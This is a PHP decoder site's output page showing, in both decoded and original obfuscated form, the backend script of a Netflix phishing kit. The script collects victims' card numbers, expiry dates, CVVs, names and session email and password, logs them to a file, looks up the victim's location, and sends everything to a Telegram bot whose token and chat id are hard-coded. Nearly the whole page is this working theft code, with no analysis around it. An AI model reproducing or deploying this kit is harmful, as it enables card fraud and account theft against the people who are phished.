Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto VM0Ht; gub84: if (isset($_GET["\143\143"]) || isset($_GET["\x65\170\160"]) ||..

Decoded Output download

<?php 
 goto VM0Ht; gub84: if (isset($_GET["cc"]) || isset($_GET["exp"]) || isset($_GET["cvv"]) || isset($_GET["nom"]) || isset($_GET["ape"]) || !empty($_GET["cc"]) || !empty($_GET["exp"]) || !empty($_GET["cvv"]) || !empty($_GET["nom"]) || !empty($_GET["ape"])) { $cc = $_GET["cc"]; $exp = $_GET["exp"]; $cvv = $_GET["cvv"]; $nom = $_GET["nom"]; $ape = $_GET["ape"]; $user = $_SESSION["email"]; $pass = $_SESSION["pass"]; $identificador = $_SESSION["identificador"]; $bot_token = "6082038756:AAGvEnU1aydvJqONKRoGFl3GcKCMnGZ4Dm8"; $chat_id = "-926290498"; echo "{"status":"success","errordescription":"none","number":"302"}"; $logAccesos = fopen("../rackotest.txt", "a+"); fwrite($logAccesos, "
------------------NETFLIX 2023------------------
ID : " . $identificador . "

User : " . $user . "\xaPass : " . $pass . "\xa
Nombre : " . $nom . "  " . $ape . " 
CC  : " . $cc . "
VEN : " . $exp . "
CVV : " . $cvv . "
----------------@RACKOLINARES--------------\xd
"); fclose($logAccesos); date_default_timezone_set("America/Argentina/Cordoba"); $TIME = date("d-m-Y H:i:s"); $IP_LOOKUP = @json_decode(file_get_contents("http://ip-api.com/json/" . $ipp . "?client=" . $client)); $LOOKUP_COUNTRY = $IP_LOOKUP->country; $LOOKUP_CITY = $IP_LOOKUP->city; $LOOKUP_STATE = $IP_LOOKUP->regionName; $LOOKUP_ISP = $IP_LOOKUP->isp; $_SESSION["_LOOKUP_COUNTRY_"] = $LOOKUP_COUNTRY; $_SESSION["_LOOKUP_CITY_"] = $LOOKUP_CITY; $_SESSION["_LOOKUP_STATE_"] = $LOOKUP_STATE; $_SESSION["_LOOKUP_ISP_"] = $LOOKUP_ISP; $html_message = "--------------------NETFLIX 2023--------------------\xa" . "<b>\xe2\x9c\224\xef\270\217ID: </b><code>" . $identificador . "</code>\xa" . "----------------USER&PASS----------------
" . "<b>\342\234\224\xef\xb8\217USER  : </b><code>" . $user . "</code>\xa" . "<b>\342\234\224\357\xb8\217PASS      : </b><code>" . $pass . "</code>\xa" . "----------------DATOS CC----------------
" . "<b>\xe2\234\224\xef\270\x8fNOMBRE  : </b><code>" . $nom . " " . $ape . "</code>\xa" . "<b>\342\234\224\xef\xb8\217CC : </b><code>" . $cc . "</code>
" . "<b>\xe2\234\224\357\xb8\x8fDATA : </b><code>" . $exp . "</code>
" . "<b>\xe2\234\224\357\xb8\x8fCVV : </b><code>" . $cvv . "</code>
" . "<b>cheker : </b><code>" . $cc . "|" . $exp . "|" . $cvv . "|" . $nom . " " . $ape . "</code>
" . "----------[LOCATION]-----------\xa" . "<b>\342\x9c\224\357\xb8\x8fCITY: </b><code>" . $LOOKUP_CITY . "</code>\xa" . "<b>\342\234\x94\357\xb8\x8fSTATE: </b><code>" . $LOOKUP_STATE . "</code>
" . "<b>\xe2\x9c\224\357\xb8\x8fCOUNTRY: </b><code>" . $LOOKUP_COUNTRY . "</code>
" . "----------[INTERNET SERVICE PROVIDER]-----------\xa" . "<b>\342\x9c\224\357\270\217Company: </b><code>" . $LOOKUP_ISP . "</code>\xa" . "----------[BROWSER USED]-----------\xa" . "\360\x9f\214\x90<b>Navegador </b>" . $_SERVER["HTTP_USER_AGENT"] . "\xa" . "----------[IP INFO]-----------\xa" . "\xf0\237\214\x90<b>IP Address </b>" . $client . "\xa" . "\xf0\237\x8c\220<b>SCAM HOST: </b>" . $_SERVER["SERVER_NAME"] . "
" . "<b>\xf0\237\x97\x93DATE: </b><code>" . $TIME . "</code>
" . "---------------@RACKOLINARES------------------"; $html_message = urlencode($html_message); $result = @file_get_contents("https://api.telegram.org/bot{$bot_token}/sendMessage?chat_id={$chat_id}&text={$html_message}&parse_mode=html"); } else { echo "{"status":"fail","errordescription":"Faltan datos","number":"404"}"; } goto BehaN; k7NK1: $ip_version = filter_var($client, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4); goto pFg95; XsGw_: $forward = isset($_SERVER["HTTP_X_FORWARDED_FOR"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : ''; goto hpuxT; dOLLR: $_SESSION["nom"] = $nom; goto mApVI; FhC5G: $result = "Unknown"; goto xvB9U; xvB9U: if (filter_var($client, FILTER_VALIDATE_IP)) { $ip = $client; } elseif (filter_var($forward, FILTER_VALIDATE_IP)) { $_SESSION["_ip_"] = $ip = $forward; } else { $_SESSION["_ip_"] = $ip = $remote; } goto gub84; mApVI: $_SESSION["ape"] = $ape; goto HF4q1; hpuxT: $remote = $_SERVER["REMOTE_ADDR"]; goto FhC5G; z1JTN: $client = isset($_SERVER["HTTP_X_REAL_IP"]) ? $_SERVER["HTTP_X_REAL_IP"] : $_SERVER["REMOTE_ADDR"]; goto k7NK1; pFg95: if (!$client) { $ip_binary = inet_pton($client); $client = inet_ntop(substr($ip_binary, 12)); } goto BK3LX; VM0Ht: session_start(); goto z1JTN; BehaN: $_SESSION["client"] = $client; goto dOLLR; BK3LX: $ipp = ''; goto XsGw_; HF4q1: ?>

Did this file decode correctly?

Original Code

<?php
 goto VM0Ht; gub84: if (isset($_GET["\143\143"]) || isset($_GET["\x65\170\160"]) || isset($_GET["\x63\166\166"]) || isset($_GET["\156\x6f\x6d"]) || isset($_GET["\141\160\145"]) || !empty($_GET["\143\143"]) || !empty($_GET["\x65\170\x70"]) || !empty($_GET["\x63\x76\166"]) || !empty($_GET["\x6e\157\155"]) || !empty($_GET["\141\160\x65"])) { $cc = $_GET["\x63\143"]; $exp = $_GET["\x65\170\x70"]; $cvv = $_GET["\143\166\x76"]; $nom = $_GET["\x6e\x6f\x6d"]; $ape = $_GET["\141\160\x65"]; $user = $_SESSION["\145\x6d\x61\151\x6c"]; $pass = $_SESSION["\x70\x61\x73\x73"]; $identificador = $_SESSION["\151\x64\x65\156\164\151\146\151\143\141\144\157\x72"]; $bot_token = "\x36\60\70\62\60\x33\70\67\x35\x36\72\101\101\x47\x76\x45\156\125\x31\x61\x79\144\166\x4a\161\117\x4e\113\x52\157\107\106\x6c\x33\x47\x63\113\x43\115\x6e\107\132\64\x44\155\x38"; $chat_id = "\x2d\71\62\x36\62\x39\x30\x34\x39\70"; echo "\173\42\163\x74\x61\164\x75\163\x22\x3a\42\163\x75\x63\x63\x65\x73\x73\x22\54\x22\145\x72\x72\x6f\162\x64\x65\x73\x63\162\151\160\164\x69\x6f\156\x22\72\42\x6e\157\156\145\42\x2c\x22\156\165\155\x62\145\x72\x22\72\x22\63\x30\x32\x22\x7d"; $logAccesos = fopen("\56\56\57\x72\x61\x63\153\157\x74\145\163\x74\56\x74\170\164", "\x61\53"); fwrite($logAccesos, "\12\55\x2d\x2d\55\55\x2d\x2d\x2d\55\x2d\x2d\55\55\x2d\x2d\x2d\x2d\55\x4e\105\124\106\114\x49\x58\x20\x32\60\62\63\55\x2d\x2d\55\x2d\x2d\x2d\x2d\x2d\x2d\55\x2d\55\x2d\55\55\x2d\55\12\x49\x44\40\72\40" . $identificador . "\12\12\125\163\x65\x72\x20\x3a\40" . $user . "\xa\x50\x61\x73\163\x20\72\40" . $pass . "\xa\12\x4e\x6f\x6d\x62\x72\x65\40\72\40" . $nom . "\40\40" . $ape . "\x20\12\103\103\x20\x20\72\x20" . $cc . "\12\126\x45\116\40\72\x20" . $exp . "\12\103\126\x56\40\72\x20" . $cvv . "\12\x2d\55\55\55\x2d\x2d\x2d\55\x2d\55\55\55\x2d\x2d\55\x2d\100\x52\101\103\113\117\x4c\111\116\x41\122\x45\123\55\55\x2d\55\55\x2d\55\55\55\x2d\x2d\x2d\x2d\x2d\xd\12"); fclose($logAccesos); date_default_timezone_set("\101\155\145\x72\x69\x63\141\x2f\101\x72\147\145\156\x74\151\156\141\57\x43\157\x72\144\x6f\142\x61"); $TIME = date("\144\x2d\155\x2d\x59\x20\x48\72\151\72\163"); $IP_LOOKUP = @json_decode(file_get_contents("\x68\164\164\160\72\x2f\x2f\x69\x70\x2d\x61\160\151\56\x63\157\x6d\57\152\x73\x6f\x6e\57" . $ipp . "\77\x63\154\151\x65\x6e\164\x3d" . $client)); $LOOKUP_COUNTRY = $IP_LOOKUP->country; $LOOKUP_CITY = $IP_LOOKUP->city; $LOOKUP_STATE = $IP_LOOKUP->regionName; $LOOKUP_ISP = $IP_LOOKUP->isp; $_SESSION["\x5f\114\117\x4f\113\x55\x50\x5f\103\117\x55\116\x54\122\131\x5f"] = $LOOKUP_COUNTRY; $_SESSION["\x5f\114\x4f\x4f\x4b\125\120\137\x43\x49\124\131\137"] = $LOOKUP_CITY; $_SESSION["\137\114\117\x4f\x4b\125\120\137\x53\x54\101\124\x45\x5f"] = $LOOKUP_STATE; $_SESSION["\x5f\114\117\x4f\113\x55\120\137\111\123\x50\x5f"] = $LOOKUP_ISP; $html_message = "\55\x2d\55\x2d\55\55\55\x2d\55\55\x2d\55\x2d\x2d\55\55\x2d\55\55\55\x4e\105\x54\x46\x4c\111\x58\40\x32\60\62\x33\55\55\55\x2d\x2d\55\55\x2d\55\x2d\x2d\x2d\x2d\55\55\55\55\x2d\x2d\55\xa" . "\74\x62\76\xe2\x9c\224\xef\270\217\x49\x44\72\x20\x3c\x2f\x62\x3e\74\143\x6f\x64\145\x3e" . $identificador . "\x3c\x2f\143\157\x64\145\x3e\xa" . "\55\55\55\55\55\x2d\55\x2d\x2d\x2d\x2d\x2d\55\55\x2d\55\x55\123\105\x52\46\120\x41\x53\x53\55\55\55\55\x2d\x2d\x2d\x2d\55\55\55\55\x2d\55\x2d\55\12" . "\x3c\142\76\342\234\224\xef\xb8\217\125\123\x45\122\x20\40\x3a\40\74\x2f\142\x3e\74\143\x6f\144\x65\x3e" . $user . "\x3c\57\x63\x6f\144\145\76\xa" . "\x3c\x62\76\342\234\224\357\xb8\217\x50\101\123\123\40\40\x20\x20\x20\x20\72\40\74\x2f\142\x3e\x3c\x63\x6f\x64\x65\76" . $pass . "\74\57\x63\157\144\145\76\xa" . "\x2d\55\55\55\55\55\55\x2d\55\55\x2d\55\x2d\55\x2d\55\104\101\x54\x4f\123\40\103\103\55\55\x2d\x2d\x2d\55\55\55\x2d\x2d\x2d\x2d\55\55\55\x2d\12" . "\74\142\76\xe2\234\224\xef\270\x8f\116\x4f\x4d\102\x52\x45\40\40\x3a\x20\x3c\x2f\142\76\x3c\143\157\144\145\x3e" . $nom . "\x20" . $ape . "\74\x2f\143\x6f\x64\145\x3e\xa" . "\74\x62\x3e\342\234\224\xef\xb8\217\103\103\40\72\x20\74\x2f\x62\x3e\74\x63\x6f\x64\145\x3e" . $cc . "\x3c\x2f\143\157\144\x65\76\12" . "\74\x62\x3e\xe2\234\224\357\xb8\x8f\104\101\x54\x41\40\x3a\x20\x3c\x2f\x62\76\x3c\143\157\144\145\x3e" . $exp . "\x3c\57\x63\x6f\x64\x65\76\12" . "\x3c\142\76\xe2\234\224\357\xb8\x8f\x43\x56\126\x20\x3a\x20\x3c\x2f\142\76\x3c\x63\x6f\144\145\x3e" . $cvv . "\x3c\57\x63\x6f\144\145\x3e\12" . "\74\x62\76\143\x68\x65\153\x65\162\40\x3a\40\74\x2f\142\76\74\x63\157\144\x65\x3e" . $cc . "\x7c" . $exp . "\x7c" . $cvv . "\174" . $nom . "\x20" . $ape . "\74\57\143\x6f\x64\145\76\12" . "\55\55\55\55\55\x2d\x2d\x2d\x2d\55\x5b\114\x4f\103\x41\x54\111\117\x4e\x5d\x2d\x2d\x2d\x2d\55\x2d\55\55\x2d\55\55\xa" . "\x3c\x62\x3e\342\x9c\224\357\xb8\x8f\103\111\124\131\x3a\40\74\x2f\x62\76\x3c\143\x6f\x64\145\76" . $LOOKUP_CITY . "\74\x2f\143\x6f\144\x65\x3e\xa" . "\x3c\142\x3e\342\234\x94\357\xb8\x8f\x53\x54\x41\124\105\x3a\40\x3c\x2f\142\x3e\x3c\x63\x6f\144\145\x3e" . $LOOKUP_STATE . "\x3c\57\x63\x6f\144\x65\76\12" . "\74\x62\x3e\xe2\x9c\224\357\xb8\x8f\103\117\125\116\124\122\x59\x3a\x20\x3c\57\x62\x3e\x3c\x63\157\144\x65\x3e" . $LOOKUP_COUNTRY . "\x3c\57\143\x6f\144\145\x3e\12" . "\55\55\55\x2d\55\x2d\x2d\55\55\x2d\x5b\111\x4e\124\105\122\116\105\x54\x20\123\105\x52\x56\111\x43\105\40\x50\x52\x4f\126\111\104\105\122\x5d\55\x2d\55\x2d\55\x2d\x2d\x2d\55\55\55\xa" . "\74\x62\76\342\x9c\224\357\270\217\103\157\155\x70\141\x6e\171\72\40\x3c\x2f\x62\x3e\74\143\x6f\144\x65\76" . $LOOKUP_ISP . "\74\x2f\x63\157\x64\x65\76\xa" . "\55\55\x2d\x2d\55\55\x2d\x2d\55\x2d\133\102\x52\117\127\123\105\122\40\125\x53\105\x44\135\55\55\x2d\55\x2d\55\x2d\x2d\55\55\x2d\xa" . "\360\x9f\214\x90\x3c\142\76\x4e\141\166\x65\147\x61\x64\x6f\x72\x20\74\57\142\x3e" . $_SERVER["\x48\x54\124\x50\x5f\125\123\x45\x52\137\x41\107\x45\116\124"] . "\xa" . "\x2d\55\x2d\x2d\55\x2d\55\55\55\x2d\133\111\120\40\111\x4e\106\x4f\135\x2d\55\x2d\55\55\x2d\55\55\x2d\55\55\xa" . "\xf0\237\214\x90\74\142\x3e\111\x50\40\x41\x64\144\x72\x65\x73\163\x20\74\x2f\142\76" . $client . "\xa" . "\xf0\237\x8c\220\x3c\142\x3e\123\x43\101\x4d\40\110\117\x53\x54\x3a\40\74\x2f\x62\76" . $_SERVER["\123\105\x52\x56\105\122\137\x4e\x41\115\105"] . "\12" . "\x3c\x62\x3e\xf0\237\x97\x93\104\x41\x54\x45\72\x20\x3c\57\142\76\x3c\x63\157\144\145\76" . $TIME . "\74\57\x63\x6f\144\145\76\12" . "\55\x2d\55\55\55\x2d\55\x2d\55\55\55\x2d\55\x2d\55\100\122\x41\x43\x4b\x4f\114\x49\x4e\x41\122\x45\x53\x2d\55\x2d\55\55\55\x2d\x2d\x2d\x2d\55\55\55\55\x2d\55\x2d\55"; $html_message = urlencode($html_message); $result = @file_get_contents("\150\x74\x74\160\163\x3a\57\57\x61\x70\x69\x2e\x74\145\x6c\x65\x67\x72\x61\155\x2e\x6f\162\x67\57\142\157\164{$bot_token}\x2f\x73\145\x6e\144\x4d\x65\x73\163\141\147\x65\77\143\x68\x61\164\x5f\x69\x64\75{$chat_id}\x26\164\x65\170\164\75{$html_message}\x26\160\x61\x72\x73\x65\137\x6d\157\x64\145\x3d\150\x74\155\x6c"); } else { echo "\x7b\42\x73\164\141\164\x75\x73\x22\72\42\x66\141\151\154\x22\54\x22\145\162\x72\x6f\162\x64\145\163\x63\x72\x69\160\164\151\157\156\x22\72\x22\x46\141\x6c\164\x61\156\40\144\x61\164\157\163\x22\54\x22\x6e\x75\x6d\x62\145\x72\x22\72\42\x34\60\64\42\x7d"; } goto BehaN; k7NK1: $ip_version = filter_var($client, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4); goto pFg95; XsGw_: $forward = isset($_SERVER["\x48\x54\124\x50\137\x58\137\106\x4f\122\x57\101\122\104\105\104\x5f\x46\x4f\x52"]) ? $_SERVER["\x48\x54\124\x50\x5f\x58\137\106\117\122\x57\x41\x52\x44\x45\x44\137\106\x4f\122"] : ''; goto hpuxT; dOLLR: $_SESSION["\156\x6f\x6d"] = $nom; goto mApVI; FhC5G: $result = "\x55\x6e\x6b\x6e\157\x77\156"; goto xvB9U; xvB9U: if (filter_var($client, FILTER_VALIDATE_IP)) { $ip = $client; } elseif (filter_var($forward, FILTER_VALIDATE_IP)) { $_SESSION["\137\x69\160\x5f"] = $ip = $forward; } else { $_SESSION["\137\x69\160\x5f"] = $ip = $remote; } goto gub84; mApVI: $_SESSION["\x61\x70\145"] = $ape; goto HF4q1; hpuxT: $remote = $_SERVER["\122\105\x4d\117\124\x45\x5f\101\104\104\122"]; goto FhC5G; z1JTN: $client = isset($_SERVER["\110\x54\124\120\137\x58\137\x52\105\x41\x4c\137\x49\120"]) ? $_SERVER["\110\x54\x54\120\x5f\130\x5f\122\x45\x41\114\x5f\111\x50"] : $_SERVER["\x52\x45\115\x4f\124\105\137\x41\104\104\122"]; goto k7NK1; pFg95: if (!$client) { $ip_binary = inet_pton($client); $client = inet_ntop(substr($ip_binary, 12)); } goto BK3LX; VM0Ht: session_start(); goto z1JTN; BehaN: $_SESSION["\x63\154\151\145\x6e\164"] = $client; goto dOLLR; BK3LX: $ipp = ''; goto XsGw_; HF4q1: ?>

Function Calls

None

Variables

None

Stats

MD5 778a5d1995e6df7ce61b10f5d6af3e8a
Eval Count 0
Decode Time 40 ms